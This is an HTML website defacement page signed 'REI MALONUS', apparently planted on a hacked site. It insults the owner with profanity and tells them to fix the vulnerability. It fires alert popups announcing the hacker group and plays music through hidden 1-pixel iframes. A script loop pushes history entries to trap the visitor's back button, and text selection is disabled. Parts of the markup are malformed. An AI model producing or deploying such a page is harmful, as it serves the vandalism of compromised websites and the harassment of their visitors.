<!doctype html>
<html lang="en">
  <head>
    <title>REI MALONUS</title>
    
    
    <link rel="shortcut icon" type="image/png" href="https://i.gifer.com/WczY.gif"/>
    
    <link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Jolly+Lodger&display=swap" rel="stylesheet">

<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Indie+Flower&display=swap" rel="stylesheet">

<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Iceland&display=swap" rel="stylesheet">

<link rel="preconnect" href="https://fonts.googleapis.com">
<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
<link href="https://fonts.googleapis.com/css2?family=Cinzel:wght@500&display=swap" rel="stylesheet">


 <audio autoplay>
  <source src="  <iframe frameborder="0" height="1" width="1" loop="true" allow="autoplay" src="https://j.top4top.io/m_1610p0alr0.mp3"></iframe>" type="audio/mpeg">
  </audio>
   <iframe frameborder="0" height="1" width="1" loop="true" allow="autoplay" src="https://j.top4top.io/m_1610p0alr0.mp3"></iframe>



<style type="text/css"> @import url("https://fonts.googleapis.com/css?family=Iceland|Shadows+Into+Light&display=swap"); body{ overflow:hidden; display: flex; align-items: center; justify-content: center; margin:0; padding:0; width:100%; background-color:black; } i{ margin:10px; color: red; } a:link{ color:#000; } 
h1{ 
text-shadow: 1px 1px 50px red , 0px 0px 20px red;
color: #000; 
text-decoration: none; 
border-radius:0px; 
border:0px; 
font-family: 'Shadows Into Light', cursive; 
font-size:40px; 
margin:0px; 
padding:0px; 
animation:psychoxploit 0.5s linear infinite; }

h2{
  
  background:transparent;
	border:2px solid silver;
	box-shadow: 1px 1px 10px white ;
	font-family:Cinzel;
	width: 85%;
	height: 65px;
	color:white;
	font-size:18x;
	font-weight:bold;
	padding:3px 29px;
	text-decoration:none;
	text-shadow:0px 0px 50px #15CFF4;
  
}

pre{ color:grey; } marquee{ width:100%; } @keyframes psychoxploit{ 2%{color:#fff;} 3%{transform:translate(2px,-10px) skewX(3240deg);} 5%{transform:translate(0px,0px) skewX(0deg);} 2% , 54%{transform:translateX(0px) skew(0deg);} 55%{transform:translate(-2px,6px) skew(-5530deg);} 56%{transform:translate(0px,0px) skew(0deg);} 57%{transform:translate(4px,-10px) skew(-70deg);} 58%{transform:translate(0px,0px) skew(0deg);} 62%{transform:translate(0px,20px) skew(0deg);} 63%{transform:translate(4px,-2px) skew(0deg);} 90%{transform:translate(1px,3px); skew(-230deg);} 95%{transform:translate(-7px,2px); skew(-120deg);} 100%{transform:translate(0px,0px) skew(0deg);} </style> <body scroll="no" style="overflow: hidden" ondragstart="window.event.returnValue=false" onselectstart="event.returnValue=false"> <script> (function () { for(var i = 0; i < 20; i++) { history.pushState(null, document.title, window.location.href ); } })(document, window, history); </script>
    
  </head>
  <body>
    <div class="container text-center mx-auto"> 	<script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript">
</script>
<body>
<br>
<br>
<br>
<br>
	<center><img src="https://i.ibb.co/vs9r4k4/wp7611230-one-piece-amoled-wallpapers-01-01-02-01.jpg" width="330" height="330">
<br>
<h1><font color="red">|....VISITED BY</font><font face="Indie Flower" size="8" color="white" style="text-shadow:1px 1px 50px aqua , 0px 0px 20px aqua ;"> REI MALONUS ....|</h1></font>
<br>
<font face="cursive" size="6" color="yellow" style="text-shadow:1px 1px 50px yellow , 0px 0px 20px yellow;"><= NOTICE =></font></font>
<br>
<br>
<center><font face="Jolly Lodger" size="6" color="red">{ HEY DUMB }</font>
<br>
<br>
<font face="Iceland" size="6" color="red" style="text-shadow:1px 1px 50px red , 0px 0px 20px red ;">FUCK YOUR <font></font><font color="silver" size="6" style="text-shadow:1px 1px 50px aqua , 0px 0px 20px aqua ;"> STUPID WEBSITE...!</font></font>
<br>
<br>
<font face="Iceland" size="5" color="red" style="text-shadow:1px 1px 50px red , 0px 0px 20px red ;">LUCKY YOU, I AM IN A GOOD MOOD</font></font>
<br>
<br>
<font face="Iceland" size="5" color="silver" style="text-shadow:1px 1px 50px aqua , 0px 0px 20px aqua ;">FIX WEBSITE VULNERABILITY BEFORE IT'S TOO LATE</font></font>
<br>
<br>
<center><font face="Iceland" color="red" size="5" style="text-shadow:1px 1px 50px red , 0px 0px 20px red;">AND NEXT TIME BE CAREFUL </font></font>
<br>
<br>
<br>
<div id="clock" class="text" style="color: silver; font-family: Kelly+Slab; font-size: 40px; text-shadow:1px 1px 50px aqua , 0px 0px 20px aqua ;"></div>

<script type="text/javascript">

    <!--

    function showTime() {

        var a_p = "";

        var today = new Date();

        var curr_hour = today.getHours();

        var curr_minute = today.getMinutes();

        var curr_second = today.getSeconds();

        if (curr_hour < 24) {

            a_p = "";

        } else {

            a_p = "";

        }

        if (curr_hour == 0) {

            curr_hour = 24;

        }

        if (curr_hour > 24) {

            curr_hour = curr_hour - 24;

        }

        curr_hour = checkTime(curr_hour);

        curr_minute = checkTime(curr_minute);

        curr_second = checkTime(curr_second);

     document.getElementById('clock').innerHTML=curr_hour + " : " + curr_minute + " : " + curr_second + " " + a_p;

        }

 

    function checkTime(i) {

        if (i < 10) {

            i = "0" + i;

        }

        return i;

    }

    setInterval(showTime, 500);

    //-->

    </script>

<br>
<h2><font color="silver" size="25"> REI MALONUS </font>

<br>

<script type="text/javascript">

alert(" VISITED BY REI MALONUS");
alert("  WE ARE BANGLADESHI H@CK3R  ");

</script>


<br>
  <audio autoplay>
  <source src="  <iframe frameborder="0" height="1" width="1" loop="true" allow="autoplay" src="https://j.top4top.io/m_1610p0alr0.mp3"></iframe>" type="audio/mpeg">
  </audio>
   <iframe frameborder="0" height="1" width="1" loop="true" allow="autoplay" src="https://j.top4top.io/m_1610p0alr0.mp3"></iframe>
<br>
<br>

</body>
</head>
</html>
